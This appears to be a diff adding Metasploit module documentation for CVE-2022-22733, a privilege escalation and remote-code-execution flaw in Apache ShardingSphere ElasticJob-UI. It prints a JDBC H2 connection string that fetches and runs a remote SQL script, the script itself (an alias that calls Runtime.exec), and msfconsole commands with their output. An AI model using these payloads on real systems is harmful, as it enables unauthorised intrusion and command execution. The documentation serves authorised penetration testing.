Documentation for apache_shardingsphere_cve_2022_22733.md

documentation/modules/exploit/multi/http/apache_shardingsphere_cve_2022_22733.md

@@ -0,0 +1,99 @@
+## Vulnerable Application
+
+A vulnerability discovered in Apache ShardingSphere ElasticJob-UI known as CVE-2022-22733, The vulnerability lead to exposure of sensitive informatiopns and as a results it allows an attacker who has guest account to do privilege escalation.
+
+You can setup the app using docker: `sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0`
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application: `sudo docker pull apache/shardingsphere-elasticjob-lite-ui:3.0.0`
+1. Start msfconsole
+1. Do: `use exploit/multi/http/apache_shardingsphere_cve_2022_22733`
+1. Do: `set RHOSTS target`
+1. Do: `set JDBC URL_to_your_malicious_sql_script`
+1. Do: `exploit`
+3. You should get `root` account credentials.
+
+## Options
+- `JDBC`: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql.
+- `PASSWORD`: Password for authentication.
+- `Proxies`: A proxy chain of format type:host:port[,type:host:port][...]
+- `RHOSTS`: The target host(s)
+- `RPORT`: The target port (TCP)
+- `SSL`: Negotiate SSL/TLS for outgoing connections
+- `USERNAME`: The username to authenticate with
+- `VHOST`: HTTP server virtual host
+
+
+### Option Name
+
+- `JDBC`: Payload URL for JDBC Attack ex: http://ip:8000/poc.sql. Which is used to add the url for your malicious sql script in the request to perform JDBC attack. And it's required.
+- `PASSWORD`: The password for the low-privileged account that you have, the default value is `guest` that comes with the application, The user can change if he already has an account. And it's required.
+- `Proxies`: A proxy chain of format type:host:port[,type:host:port][...]
+- `RHOSTS`: The target domain/IP. And it's required.
+- `RPORT`: The target port to the application, The default port that the application always use is `8088`. And it's required.
+- `SSL`: Negotiate SSL/TLS for outgoing connections. In case the target uses SSL. And by default is not required.
+- `USERNAME`: The username for the low-privileged account that you have, the default value is `guest` that comes with the application, The user can change if he already has an account. And it's required.
+- `VHOST`: HTTP server virtual host and it's not required.
+
+## Scenarios
+### The `JDBC` option in case you don't know what is it, You can check it from [here](https://pyn3rd.github.io/2022/06/06/Make-JDBC-Attacks-Brillian-Again-I/).
+Basically, If you have a privileged account like the `root` account, You will be able to create a database base connection.
+Now, You may be wondering, If we have the root account credentials, Why we would need to Retrieve it's token ?. So, Basically to perform a connection throug the JDBC we need high-privileges and to automate this process let's see how it works first. 
+
+![image](https://github.com/rapid7/metasploit-framework/assets/62406753/4e4be243-bc34-417c-aadf-faa157acce9e)
+
+As you can see when we logged-in as guest we are not able to add any data source. But, If we login with the root account. We can see that we have the privileges to add data source and test the connection:
+
+![image](https://github.com/rapid7/metasploit-framework/assets/62406753/06ac9719-2827-4062-ad98-aca4fc4b41e4)
+
+Now, Under the Event Tracer Data Source click on Add button and add the following:
+
+![image](https://github.com/rapid7/metasploit-framework/assets/62406753/f1d30e53-fb6f-4e5f-805f-6bf0ff0dca1f)
+
+What did we done here?. We named Our data source, then used the h2 driver the H2 itself is a relational database management system, and the org.h2.driver is a JDBC driver used to connect to an H2 database from Java. The URL value:
+
+```
+jdbc:h2:mem:testdb;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'
+```
+
+Basically, This is a JDBC connection string which will connect a H2 in memory database with the name we give which is testdb. Then, `TRACE_LEVEL_SYSTEM_OUT=3` parameter enables trace logging to be printed to the console. Finally, `INIT=RUNSCRIPT FROM 'http://192.168.0.162:8000/poc.sql'` parameter specifies that the `poc.sql` script located at our URL should be executed when the database is initialized. But, What is inside poc.sql file ?:
+
+```
+CREATE ALIAS EXEC AS 'String shellexec(String cmd) throws java.io.IOException {Runtime.getRuntime().exec(cmd);return "123";}';CALL EXEC ('calc.exe')
+```
+
+In short words, This sql script uses the H2 database ability to create an alias to execute command and here we executing calc.exe for the demo of the exploit. Now, Let's start our http server that will host our poc.sql script and after that we click on Test Connect Button:
+
+![firefox_aYpCgKHiha](https://github.com/rapid7/metasploit-framework/assets/62406753/378be99e-29d8-49e5-888b-538c5b6eeb62)
+
+
+Now, As we understand it clearly we can run our metasploit module to perform all of these.
+
+![vmware_4p7AtSwR60](https://github.com/rapid7/metasploit-framework/assets/62406753/7b6dcf50-7e77-4c92-8904-7ab6c00f0162)
+```
+[*] Attempting to authenticate...
+[+] Authenticated Successfully
+[*] Root username: root
+[*] Root password: root
+[*] Attempting to authenticate with root credentials...
+[+] Authenticated with root credentials successfully
+[*] Attempting JDBC attack...
+[+] JDBC attack successful
+```
+
+For example:
+
+To use it with the default config:
+
+```
+msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set RHOSTS 192.168.0.162
+RHOSTS => 192.168.0.162
+msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > set JDBC http://192.168.0.162:8000/poc.sql
+JDBC => http://192.168.0.162:8000/poc.sql
+msf6 exploit(multi/http/apache_shardingsphere_cve_2022_22733) > exploit
+```
+
+# Reference
+ You can read the vulnerability analysis from [Here](https://www.vicarius.io/vsociety/blog/cve-2022-22733-apache-shardingsphere-elasticjob-ui-privilege-escalation) & The exploit blog step by step from [Here](https://www.vicarius.io/vsociety/blog/unique-exploit-cve-2022-22733-privilege-escalation-and-rce).